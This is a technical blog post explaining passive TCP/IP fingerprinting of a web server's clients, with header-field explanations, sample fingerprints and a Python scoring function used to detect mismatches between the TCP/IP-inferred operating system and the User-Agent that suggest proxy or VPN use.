<span class="s1">'bestNGuesses'</span>: <span class="o">[{</span><span class="s1">'os'</span>: <span class="s1">'macOS'</span>, <span class="s1">'score'</span>: <span class="s1">'10.0/10'</span><span class="o">}</span>,
<span class="o">{</span><span class="s1">'os'</span>: <span class="s1">'macOS'</span>, <span class="s1">'score'</span>: <span class="s1">'10.0/10'</span><span class="o">}</span>,
<span class="o">{</span><span class="s1">'os'</span>: <span class="s1">'macOS'</span>, <span class="s1">'score'</span>: <span class="s1">'10.0/10'</span><span class="o">}]}</span>
---------------------------------
<span class="m">1616184541</span>: <span class="m">167</span>.99.241.135:443 -> <span class="m">85</span>.19.65.217:49988 <span class="o">[</span>SYN+ACK<span class="o">]</span>
---------------------------------
</code></pre></div>
<p><strong>Windows 10</strong>: And a Windows 10 (<code>Windows NT 10.0; Win64; x64</code>) device visiting my server:</p>
<div class="highlight"><pre><span></span><code>python tcp_fingerprint.py -i eth0 --classify
Loaded <span class="m">716</span> fingerprints from the database
listening on interface eth0
---------------------------------
<span class="m">1616184750</span>: <span class="m">186</span>.53.223.136:10047 -> <span class="m">167</span>.99.241.135:443 <span class="o">[</span>SYN<span class="o">]</span>
<span class="o">{</span><span class="s1">'avgScoreOsClass'</span>: <span class="o">{</span><span class="s1">'Android'</span>: <span class="s1">'avg=3.88, N=36'</span>,
<span class="s1">'Linux'</span>: <span class="s1">'avg=4.85, N=99'</span>,
<span class="s1">'Windows'</span>: <span class="s1">'avg=7.47, N=365'</span>,
<span class="s1">'iOS'</span>: <span class="s1">'avg=4.03, N=20'</span>,
<span class="s1">'macOS'</span>: <span class="s1">'avg=3.81, N=189'</span><span class="o">}</span>,
<span class="s1">'bestNGuesses'</span>: <span class="o">[{</span><span class="s1">'os'</span>: <span class="s1">'Windows'</span>, <span class="s1">'score'</span>: <span class="s1">'10.0/10'</span><span class="o">}</span>,
<span class="o">{</span><span class="s1">'os'</span>: <span class="s1">'Windows'</span>, <span class="s1">'score'</span>: <span class="s1">'10.0/10'</span><span class="o">}</span>,
<span class="o">{</span><span class="s1">'os'</span>: <span class="s1">'Windows'</span>, <span class="s1">'score'</span>: <span class="s1">'10.0/10'</span><span class="o">}]}</span>
---------------------------------
<span class="m">1616184750</span>: <span class="m">167</span>.99.241.135:443 -> <span class="m">186</span>.53.223.136:10047 <span class="o">[</span>SYN+ACK<span class="o">]</span>
---------------------------------
</code></pre></div>
<h2>Introduction</h2>
<p>In this blog post, I try to TCP/IP fingerprint web clients that connect to a web server.</p>
<p>The <a href="https://github.com/NikolaiT/zardaxt">fingerprinting tool</a> is running passively on the server and does not modify TCP/IP packets. The goal is to detect a mismatch between the operating system specified in the HTTP User-Agent header and the operating system inferred from the TCP/IP header intricacies. Put differently: If the operating system inferred from the TCP/IP fingerprint is different from the operating system claimed in the User-Agent, there <em>must</em> be something wrong with that client.</p>
<p>Quick TCP/IP recap:</p>
<p>The <a href="https://en.wikipedia.org/wiki/Internet_Protocol">Internet Protocol (IP)</a> is responsible for transmitting packets from host to host. A host is a node in a network that is addressable with an IPv4 or IPv6 address. IP operates on the Internet/Network layer.</p>
<p><a href="https://en.wikipedia.org/wiki/Transmission_Control_Protocol">Transmission Control Protocol (TCP)</a> however is one layer above IP. TCP is mainly responsible for providing a robust, reliable connection between two hosts. TCP brings packet loss recovery, guarantees the packet order and handles congestion control. TCP is connection oriented: it does not care about the routers and intermediate hops between the two communicating hosts.</p>
<h2>Motivation</h2>
<p>Many users need to access anonymizing services such as VPNs or Proxy servers in order to evade Geo-blocking or governmental firewalls.</p>
<p>Those services are also frequently used for scraping purposes (which I don't have any issues with, as long as the scraping traffic does not impair the websites or accesses private data).</p>
<p>However, many cyber criminals also use services such as SOCKS proxies, Tor or VPNs to launch cyber attacks and to hide their true IP identity.</p>
<p>For those reasons, it would be nice to have a tool that allows us to make a statistical conjecture such as: <em>"It is very likely that this TCP/IP connection is routed over a VPN/Proxy"</em>.</p>
<h2>But what exactly is TCP/IP fingerprinting?</h2>
<p>The hypothesis is that different operating systems (and different minor versions among those operating systems) use different default values in their initial TCP SYN packet that initiates the <a href="https://en.wikipedia.org/wiki/Transmission_Control_Protocol#Connection_establishment">TCP three-way handshake</a>.</p>
<p>In this blog post, we will exclusively look at the initial TCP SYN packet. I am perfectly aware that we could investigate the whole TCP packet exchange to deduce more information, such as for example what kind of <a href="https://en.wikipedia.org/wiki/TCP_congestion_control">TCP congestion control algorithm</a> the client suggests. For example, <a href="https://en.wikipedia.org/wiki/Compound_TCP">Compound TCP</a> is mostly supported by Microsoft Windows operating systems. But I will limit the analysis to the initial SYN packet.</p>
<p>Which TCP/IP header fields exactly are assumed to be OS-specific?</p>
<h3>Entropy from the <a href="https://en.wikipedia.org/wiki/IPv4">IP header</a></h3>
<ul>
<li><code>IP.ttl (8 bits)</code> - Initial time to live (TTL) value of the IP header. The TTL indicates how long an IP packet is allowed to circulate in the Internet. Each hop (such as a router) decrements the TTL field by one. The maximum TTL value is 255, the maximum value of a single octet (8 bits). A recommended initial value is 64, but some operating systems customize this value. Hence its relevance for TCP/IP fingerprinting.</li>
<li><code>IP.flags (3 bits)</code> - Don't fragment (DF) and more fragments (MF) flags. In the flags field of the IPv4 header, there are three bits for control flags. The "don't fragment" (DF) bit plays a central role in Path Maximum Transmission Unit Discovery (PMTUD) because it determines whether or not a packet is allowed to be <a href="https://www.cisco.com/c/en/us/support/docs/ip/generic-routing-encapsulation-gre/25885-pmtud-ipfrag.html">fragmented</a>. Some operating systems set the DF flag in the IP header, others don't.</li>
</ul>
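<p>Since every hop decrements the TTL, the server only sees the remaining TTL, not the initial one. A minimal sketch of how the initial value could be estimated is shown below. The list of common initial TTLs and the function names are my own assumptions for illustration and are not taken from the fingerprinting tool.</p>

```python
# Commonly seen initial TTL values. This list is an assumption made for
# illustration; real operating systems may use other defaults.
COMMON_INITIAL_TTLS = (32, 64, 128, 255)


def guess_initial_ttl(observed_ttl):
    """Return the smallest common initial TTL that is >= the observed TTL."""
    if not 0 <= observed_ttl <= 255:
        raise ValueError('TTL must fit into 8 bits')
    for initial in COMMON_INITIAL_TTLS:
        if observed_ttl <= initial:
            return initial


def estimate_hops(observed_ttl):
    """Estimate how many hops the packet travelled before it was observed."""
    return guess_initial_ttl(observed_ttl) - observed_ttl


# An observed TTL of 55 suggests an initial TTL of 64 and roughly 9 hops.
print(guess_initial_ttl(55), estimate_hops(55))
```

<p>This only works as a rough heuristic: a client that starts with an unusual initial TTL would be rounded up to the wrong bucket.</p>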
<h3>Entropy from the <a href="https://en.wikipedia.org/wiki/Transmission_Control_Protocol">TCP header</a></h3>
<figure>
<img src="https://incolumitas.com/images/tcpHeader.jpg" alt="TCP header" />
<figcaption>TCP header fields <a style="font-size: 80%" href="https://stackoverflow.com/questions/24480272/where-is-the-source-and-destination-address-fields-in-tcp-header">(Image Source)</a><span style="font-size: 60%"></span></figcaption>
</figure>
<ul>
<li><code>TCP.data_offset (4 bits)</code> - This is the size of the TCP header in 32-bit words with a minimum size of 5 words and a maximum size of 15 words. Therefore, the maximum TCP header size is 60 bytes (with 40 bytes of options data). The TCP header size thus depends on how many options are present at the end of the header.</li>
<li><code>TCP.window_size (16 bits)</code> - Initial window size. The idea is that different operating systems use a different initial window size in the initial TCP SYN packet.</li>
<li><code>TCP.flags (9 bits)</code> - This header field contains 9 one-bit flags for TCP protocol controlling purposes. The initial SYN packet mostly has a flags value of 2 (which means that only the SYN flag is set). However, I have also observed flags values of 194 (2^1 + 2^6 + 2^7), which means that the SYN, ECE and CWR flags are set to one. If the SYN flag is set, ECE means that the client is <a href="https://en.wikipedia.org/wiki/Explicit_Congestion_Notification">ECN</a> capable. Outside of the handshake, Congestion window reduced (CWR) means that the sending host received a TCP segment with the ECE flag set and has responded with its congestion control mechanism.</li>
<li><code>TCP.acknowledgment_number (32 bits)</code> - If the ACK flag is set then the value of this field is the next sequence number that the sender of the ACK is expecting. <em>Should</em> be zero if the SYN flag is set on the very first packet.</li>
<li><code>TCP.sequence_number (32 bits)</code> - If the SYN flag is set (1), then this is the initial sequence number. It is conjectured that different operating systems use different initial sequence numbers, but the initial sequence number is most likely randomly chosen. Therefore this field is most likely of no particular help regarding fingerprinting.</li>
<li><code>TCP.urgent_pointer (16 bits)</code> - If the URG flag is set, then this 16-bit field is an offset from the sequence number indicating the last urgent data byte. It <em>should</em> be zero in initial SYN packets.</li>
<li><code>TCP.options (Variable 0-320 bits)</code> - All TCP Options. The length of this field is determined by the data offset field. It contains a lot of information, most importantly the Maximum Segment Size (MSS) and the window scale value. Because the TCP options data is variable in size, it is the most important source of entropy to distinguish operating systems. The order of the TCP options is also taken into account.</li>
</ul>
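<p>To make the flags values mentioned above more tangible, here is a small sketch that decodes a numeric flags value into flag names. The helper name <code>decode_tcp_flags</code> is hypothetical; the bit positions follow the standard TCP header layout, with NS as the historical ninth flag.</p>

```python
# Bit positions of the nine TCP flags, lowest bit first.
TCP_FLAG_BITS = [
    ('FIN', 0x001),
    ('SYN', 0x002),
    ('RST', 0x004),
    ('PSH', 0x008),
    ('ACK', 0x010),
    ('URG', 0x020),
    ('ECE', 0x040),
    ('CWR', 0x080),
    ('NS', 0x100),
]


def decode_tcp_flags(value):
    """Return the names of all flags that are set in the numeric flags value."""
    return [name for name, bit in TCP_FLAG_BITS if value & bit]


print(decode_tcp_flags(2))    # plain SYN packet
print(decode_tcp_flags(194))  # SYN packet of an ECN capable client
```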
<h3>Example TCP/IP Fingerprint</h3>
<p>Enough theory. Let's get practical. Now I will present two TCP/IP fingerprinting samples, one taken with my desktop computer (Ubuntu 18.04), the other recorded with my Android 9 mobile phone (Motorola g6).</p>
<p>Desktop Ubuntu 18.04 (User-Agent: <em>Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36</em>)</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ts"</span><span class="p">:</span><span class="w"> </span><span class="mi">1615647148</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"src_ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"79.203.24.230"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"dst_ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"167.99.241.135"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"dst_port"</span><span class="p">:</span><span class="w"> </span><span class="s2">"443"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip_ttl"</span><span class="p">:</span><span class="w"> </span><span class="mi">55</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip_df"</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip_mf"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_window_size"</span><span class="p">:</span><span class="w"> </span><span class="mi">29200</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_flags"</span><span class="p">:</span><span class="w"> </span><span class="mi">2</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_ack"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_header_length"</span><span class="p">:</span><span class="w"> </span><span class="mi">160</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_urp"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_options"</span><span class="p">:</span><span class="w"> </span><span class="s2">"M1412,S,T,N,W7,"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_window_scaling"</span><span class="p">:</span><span class="w"> </span><span class="mi">7</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_timestamp"</span><span class="p">:</span><span class="w"> </span><span class="mi">3733126878</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_timestamp_echo_reply"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_mss"</span><span class="p">:</span><span class="w"> </span><span class="mi">1412</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>Android Motorola (g6)</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ts"</span><span class="p">:</span><span class="w"> </span><span class="mi">1615656348</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"src_ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"79.203.24.230"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"dst_ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"167.99.241.135"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"dst_port"</span><span class="p">:</span><span class="w"> </span><span class="s2">"443"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip_ttl"</span><span class="p">:</span><span class="w"> </span><span class="mi">55</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip_df"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip_mf"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_window_size"</span><span class="p">:</span><span class="w"> </span><span class="mi">65535</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_flags"</span><span class="p">:</span><span class="w"> </span><span class="mi">2</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_ack"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_header_length"</span><span class="p">:</span><span class="w"> </span><span class="mi">160</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_urp"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_options"</span><span class="p">:</span><span class="w"> </span><span class="s2">"M1412,S,T,N,W9,"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_window_scaling"</span><span class="p">:</span><span class="w"> </span><span class="mi">9</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_timestamp"</span><span class="p">:</span><span class="w"> </span><span class="mi">1355521</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_timestamp_echo_reply"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_mss"</span><span class="p">:</span><span class="w"> </span><span class="mi">1412</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>We can observe several things:</p>
<ul>
<li>Ubuntu 18.04 has an entirely different <code>tcp_window_size</code> (29200) compared to the <code>tcp_window_size</code> in Android 9 (65535)</li>
<li>The IP don't fragment (DF) bit <code>ip_df</code> is set in Ubuntu 18.04 but not in Android 9</li>
<li>The <code>tcp_window_scaling</code> value is different in the two operating systems (7 vs 9)</li>
</ul>
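<p>The comparison above can also be done programmatically. The following sketch copies the header fields from the two samples and prints every field that differs. The function name <code>diff_fingerprints</code> is hypothetical and only serves as an illustration.</p>

```python
# Header fields copied from the two samples above (timestamps and IPs omitted).
ubuntu = {
    'ip_ttl': 55, 'ip_df': 1, 'ip_mf': 0,
    'tcp_window_size': 29200, 'tcp_flags': 2, 'tcp_header_length': 160,
    'tcp_options': 'M1412,S,T,N,W7,', 'tcp_window_scaling': 7, 'tcp_mss': 1412,
}
android = {
    'ip_ttl': 55, 'ip_df': 0, 'ip_mf': 0,
    'tcp_window_size': 65535, 'tcp_flags': 2, 'tcp_header_length': 160,
    'tcp_options': 'M1412,S,T,N,W9,', 'tcp_window_scaling': 9, 'tcp_mss': 1412,
}


def diff_fingerprints(a, b):
    """Return {field: (value_a, value_b)} for all shared fields that differ."""
    return {key: (a[key], b[key]) for key in a if key in b and a[key] != b[key]}


for field, (left, right) in diff_fingerprints(ubuntu, android).items():
    print('{}: {} vs {}'.format(field, left, right))
```

<p>Note that <code>tcp_options</code> shows up as different as well, but only because the window scale value is embedded in the options string.</p>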
<p>So we learn: Different operating systems send different initial TCP/IP header fields.</p>
<p>But can we really correlate those values with operating systems? How accurate is this <em>science</em>?</p>
<p>I don't know :D </p>
<p>I could investigate the concrete TCP/IP stack implementations or look up the default values, but I am too lazy for that.</p>
<h2>How to correlate the TCP/IP Fingerprint with the Operating System?</h2>
<p>Now that we have collected TCP/IP fingerprints, we correlate those values with the User-Agent extracted from the HTTP headers and the <code>navigator.platform</code> property extracted from the <code>window.navigator</code> object.</p>
<p>The obvious caveat here is: <em>Shit in, Shit out</em>.</p>
<p>If a client spoofs any of the recorded values, we create an incorrect correlation which in turn hurts our classification system. But let's assume I have my ways to filter out spoofed data on some other layer (Hint: Behavioral analysis).</p>
<p>The above correlation process will yield a TCP/IP fingerprint enriched with the corresponding operating system. This is what the <a href="https://github.com/NikolaiT/zardaxt/tree/master/database">database</a> looks like.</p>
<p>The current classification algorithm (<a href="https://github.com/NikolaiT/zardaxt/blob/master/tcp_fingerprint.py">click here</a> for the newest version) looks like this:</p>
<div class="highlight"><pre><span></span><code><span class="k">def</span> <span class="nf">makeOsGuess</span><span class="p">(</span><span class="n">fp</span><span class="p">,</span> <span class="n">n</span><span class="o">=</span><span class="mi">3</span><span class="p">):</span>
    <span class="sd">"""</span>
<span class="sd">    Return the highest scoring TCP/IP fingerprinting match from the database.</span>
<span class="sd">    If there is more than one highest scoring match, return all the highest scoring matches.</span>
<span class="sd">    As a second guess, output the operating system with the highest, normalized average score.</span>
<span class="sd">    """</span>
    <span class="n">perfectScore</span> <span class="o">=</span> <span class="mi">10</span>
    <span class="n">scores</span> <span class="o">=</span> <span class="p">[]</span>
    <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">entry</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">dbList</span><span class="p">):</span>
        <span class="n">score</span> <span class="o">=</span> <span class="mi">0</span>
        <span class="c1"># @TODO: consider `ip_ttl`</span>
        <span class="c1"># @TODO: consider `tcp_window_scaling`</span>
        <span class="c1"># check IP DF bit</span>
        <span class="k">if</span> <span class="n">entry</span><span class="p">[</span><span class="s1">'ip_df'</span><span class="p">]</span> <span class="o">==</span> <span class="n">fp</span><span class="p">[</span><span class="s1">'ip_df'</span><span class="p">]:</span>
            <span class="n">score</span> <span class="o">+=</span> <span class="mi">1</span>
        <span class="c1"># check IP MF bit</span>
        <span class="k">if</span> <span class="n">entry</span><span class="p">[</span><span class="s1">'ip_mf'</span><span class="p">]</span> <span class="o">==</span> <span class="n">fp</span><span class="p">[</span><span class="s1">'ip_mf'</span><span class="p">]:</span>
            <span class="n">score</span> <span class="o">+=</span> <span class="mi">1</span>
        <span class="c1"># check TCP window size</span>
        <span class="k">if</span> <span class="n">entry</span><span class="p">[</span><span class="s1">'tcp_window_size'</span><span class="p">]</span> <span class="o">==</span> <span class="n">fp</span><span class="p">[</span><span class="s1">'tcp_window_size'</span><span class="p">]:</span>
            <span class="n">score</span> <span class="o">+=</span> <span class="mf">1.5</span>
        <span class="c1"># check TCP flags</span>
        <span class="k">if</span> <span class="n">entry</span><span class="p">[</span><span class="s1">'tcp_flags'</span><span class="p">]</span> <span class="o">==</span> <span class="n">fp</span><span class="p">[</span><span class="s1">'tcp_flags'</span><span class="p">]:</span>
            <span class="n">score</span> <span class="o">+=</span> <span class="mi">1</span>
        <span class="c1"># check TCP header length</span>
        <span class="k">if</span> <span class="n">entry</span><span class="p">[</span><span class="s1">'tcp_header_length'</span><span class="p">]</span> <span class="o">==</span> <span class="n">fp</span><span class="p">[</span><span class="s1">'tcp_header_length'</span><span class="p">]:</span>
            <span class="n">score</span> <span class="o">+=</span> <span class="mi">1</span>
        <span class="c1"># check TCP MSS</span>
        <span class="k">if</span> <span class="n">entry</span><span class="p">[</span><span class="s1">'tcp_mss'</span><span class="p">]</span> <span class="o">==</span> <span class="n">fp</span><span class="p">[</span><span class="s1">'tcp_mss'</span><span class="p">]:</span>
            <span class="n">score</span> <span class="o">+=</span> <span class="mf">1.5</span>
        <span class="c1"># check TCP options</span>
        <span class="k">if</span> <span class="n">entry</span><span class="p">[</span><span class="s1">'tcp_options'</span><span class="p">]</span> <span class="o">==</span> <span class="n">fp</span><span class="p">[</span><span class="s1">'tcp_options'</span><span class="p">]:</span>
            <span class="n">score</span> <span class="o">+=</span> <span class="mi">3</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="c1"># check order of TCP options (this is weaker than TCP options equality)</span>
            <span class="n">orderEntry</span> <span class="o">=</span> <span class="s1">''</span><span class="o">.</span><span class="n">join</span><span class="p">([</span><span class="n">e</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="k">for</span> <span class="n">e</span> <span class="ow">in</span> <span class="n">entry</span><span class="p">[</span><span class="s1">'tcp_options'</span><span class="p">]</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">','</span><span class="p">)</span> <span class="k">if</span> <span class="n">e</span><span class="p">])</span>
            <span class="n">orderFp</span> <span class="o">=</span> <span class="s1">''</span><span class="o">.</span><span class="n">join</span><span class="p">([</span><span class="n">e</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="k">for</span> <span class="n">e</span> <span class="ow">in</span> <span class="n">fp</span><span class="p">[</span><span class="s1">'tcp_options'</span><span class="p">]</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">','</span><span class="p">)</span> <span class="k">if</span> <span class="n">e</span><span class="p">])</span>
            <span class="k">if</span> <span class="n">orderEntry</span> <span class="o">==</span> <span class="n">orderFp</span><span class="p">:</span>
                <span class="n">score</span> <span class="o">+=</span> <span class="mi">2</span>
        <span class="n">scores</span><span class="o">.</span><span class="n">append</span><span class="p">({</span>
            <span class="s1">'i'</span><span class="p">:</span> <span class="n">i</span><span class="p">,</span>
            <span class="s1">'score'</span><span class="p">:</span> <span class="n">score</span><span class="p">,</span>
            <span class="s1">'os'</span><span class="p">:</span> <span class="n">entry</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'os'</span><span class="p">,</span> <span class="p">{})</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'name'</span><span class="p">),</span>
        <span class="p">})</span>
    <span class="c1"># Return the highest scoring TCP/IP fingerprinting match</span>
    <span class="n">scores</span><span class="o">.</span><span class="n">sort</span><span class="p">(</span><span class="n">key</span><span class="o">=</span><span class="k">lambda</span> <span class="n">x</span><span class="p">:</span> <span class="n">x</span><span class="p">[</span><span class="s1">'score'</span><span class="p">],</span> <span class="n">reverse</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
    <span class="n">guesses</span> <span class="o">=</span> <span class="p">[]</span>
    <span class="n">highest_score</span> <span class="o">=</span> <span class="n">scores</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'score'</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">guess</span> <span class="ow">in</span> <span class="n">scores</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">guess</span><span class="p">[</span><span class="s1">'score'</span><span class="p">]</span> <span class="o">!=</span> <span class="n">highest_score</span><span class="p">:</span>
            <span class="k">break</span>
        <span class="n">guesses</span><span class="o">.</span><span class="n">append</span><span class="p">({</span>
            <span class="s1">'score'</span><span class="p">:</span> <span class="s1">'</span><span class="si">{}</span><span class="s1">/</span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">guess</span><span class="p">[</span><span class="s1">'score'</span><span class="p">],</span> <span class="n">perfectScore</span><span class="p">),</span>
            <span class="s1">'os'</span><span class="p">:</span> <span class="n">guess</span><span class="p">[</span><span class="s1">'os'</span><span class="p">],</span>
        <span class="p">})</span>
    <span class="c1"># get the os with the highest, normalized average score</span>
    <span class="n">os_score</span> <span class="o">=</span> <span class="p">{}</span>
    <span class="k">for</span> <span class="n">guess</span> <span class="ow">in</span> <span class="n">scores</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">guess</span><span class="p">[</span><span class="s1">'os'</span><span class="p">]:</span>
            <span class="k">if</span> <span class="ow">not</span> <span class="n">os_score</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">guess</span><span class="p">[</span><span class="s1">'os'</span><span class="p">]):</span>
                <span class="n">os_score</span><span class="p">[</span><span class="n">guess</span><span class="p">[</span><span class="s1">'os'</span><span class="p">]]</span> <span class="o">=</span> <span class="p">[]</span>
            <span class="n">os_score</span><span class="p">[</span><span class="n">guess</span><span class="p">[</span><span class="s1">'os'</span><span class="p">]]</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">guess</span><span class="p">[</span><span class="s1">'score'</span><span class="p">])</span>
    <span class="n">avg_os_score</span> <span class="o">=</span> <span class="p">{}</span>
    <span class="k">for</span> <span class="n">key</span> <span class="ow">in</span> <span class="n">os_score</span><span class="p">:</span>
        <span class="n">N</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">os_score</span><span class="p">[</span><span class="n">key</span><span class="p">])</span>
        <span class="c1"># only consider OS classes with at least 8 elements</span>
        <span class="k">if</span> <span class="n">N</span> <span class="o">>=</span> <span class="mi">8</span><span class="p">:</span>
            <span class="n">avg</span> <span class="o">=</span> <span class="nb">sum</span><span class="p">(</span><span class="n">os_score</span><span class="p">[</span><span class="n">key</span><span class="p">])</span> <span class="o">/</span> <span class="nb">len</span><span class="p">(</span><span class="n">os_score</span><span class="p">[</span><span class="n">key</span><span class="p">])</span>
            <span class="n">avg_os_score</span><span class="p">[</span><span class="n">key</span><span class="p">]</span> <span class="o">=</span> <span class="s1">'avg=</span><span class="si">{}</span><span class="s1">, N=</span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="nb">round</span><span class="p">(</span><span class="n">avg</span><span class="p">,</span> <span class="mi">2</span><span class="p">),</span> <span class="n">N</span><span class="p">)</span>
    <span class="k">return</span> <span class="p">{</span>
        <span class="s1">'bestGuess'</span><span class="p">:</span> <span class="n">guesses</span><span class="p">[:</span><span class="n">n</span><span class="p">],</span>
        <span class="s1">'avgScoreOsClass'</span><span class="p">:</span> <span class="n">avg_os_score</span><span class="p">,</span>
    <span class="p">}</span>
</code></pre></div>
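<p>To get a feeling for the weights, the following sketch scores the Ubuntu 18.04 sample against the Android 9 sample from above. It is a condensed re-implementation of the per-entry scoring only. The names <code>score_pair</code> and <code>option_order</code> are hypothetical and do not exist in the tool.</p>

```python
# Weights for exact field matches, copied from the scoring logic above.
EXACT_MATCH_WEIGHTS = {
    'ip_df': 1, 'ip_mf': 1, 'tcp_window_size': 1.5,
    'tcp_flags': 1, 'tcp_header_length': 1, 'tcp_mss': 1.5,
}

ubuntu = {'ip_df': 1, 'ip_mf': 0, 'tcp_window_size': 29200, 'tcp_flags': 2,
          'tcp_header_length': 160, 'tcp_mss': 1412,
          'tcp_options': 'M1412,S,T,N,W7,'}
android = {'ip_df': 0, 'ip_mf': 0, 'tcp_window_size': 65535, 'tcp_flags': 2,
           'tcp_header_length': 160, 'tcp_mss': 1412,
           'tcp_options': 'M1412,S,T,N,W9,'}


def option_order(options):
    """Reduce 'M1412,S,T,N,W7,' to the option order 'MSTNW'."""
    return ''.join(e[0] for e in options.split(',') if e)


def score_pair(entry, fp):
    """Score how well a database entry matches a fingerprint (maximum is 10)."""
    score = sum(w for key, w in EXACT_MATCH_WEIGHTS.items() if entry[key] == fp[key])
    if entry['tcp_options'] == fp['tcp_options']:
        score += 3
    elif option_order(entry['tcp_options']) == option_order(fp['tcp_options']):
        # same option order, but different option values
        score += 2
    return score


print(score_pair(ubuntu, android))  # 6.5
print(score_pair(ubuntu, ubuntu))   # 10.0
```

<p>The two samples still reach 6.5 out of 10 points, because they only differ in the DF bit, the window size and the window scale value inside the options.</p>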
<p>To improve upon this, I need to build equivalence classes and I need to define operating system classes.</p>
<p>Major and minor operating system classes:</p>
<ol>
<li><strong>macOS</strong> and minor versions such as Sierra, High Sierra, Mojave, Catalina</li>
<li><strong>iOS</strong></li>
<li><strong>Android</strong> and minor versions such as Android 8, Android 9, Android 10</li>
<li><strong>Windows</strong> and minor versions such as Windows 7 (NT 6.1), Windows 8.1 (NT 6.3) and Windows 10 (NT 10.0)</li>
<li><strong>Linux</strong> and (maybe) distinct distributions such as Ubuntu, openSUSE, Arch Linux, ...</li>
</ol>
<p>I don't think it is feasible to classify everything properly for every minor operating system version using the User-Agent alone.</p>
<p>Nevertheless, the User-Agent should be accurate enough for the five major operating system classes. After all, most proxy or VPN servers are running some kind of Linux system, but often, the connecting clients claim to be a macOS or Windows operating system. I just want to detect that they are lying, not <em>how badly</em> they are lying.</p>
<h2>Detecting Proxy/VPN Usage with TCP/IP Fingerprinting</h2>
<p>General idea: My goal is <em>not</em> to identify a specific version of a proxy or VPN software.</p>
<p>Rather, I want to recognize that there is a discrepancy between the operating system derived from the User-Agent and the operating system suspected behind the TCP/IP fingerprint. Such a mismatch is enough to flag the established connection as potentially malicious.</p>
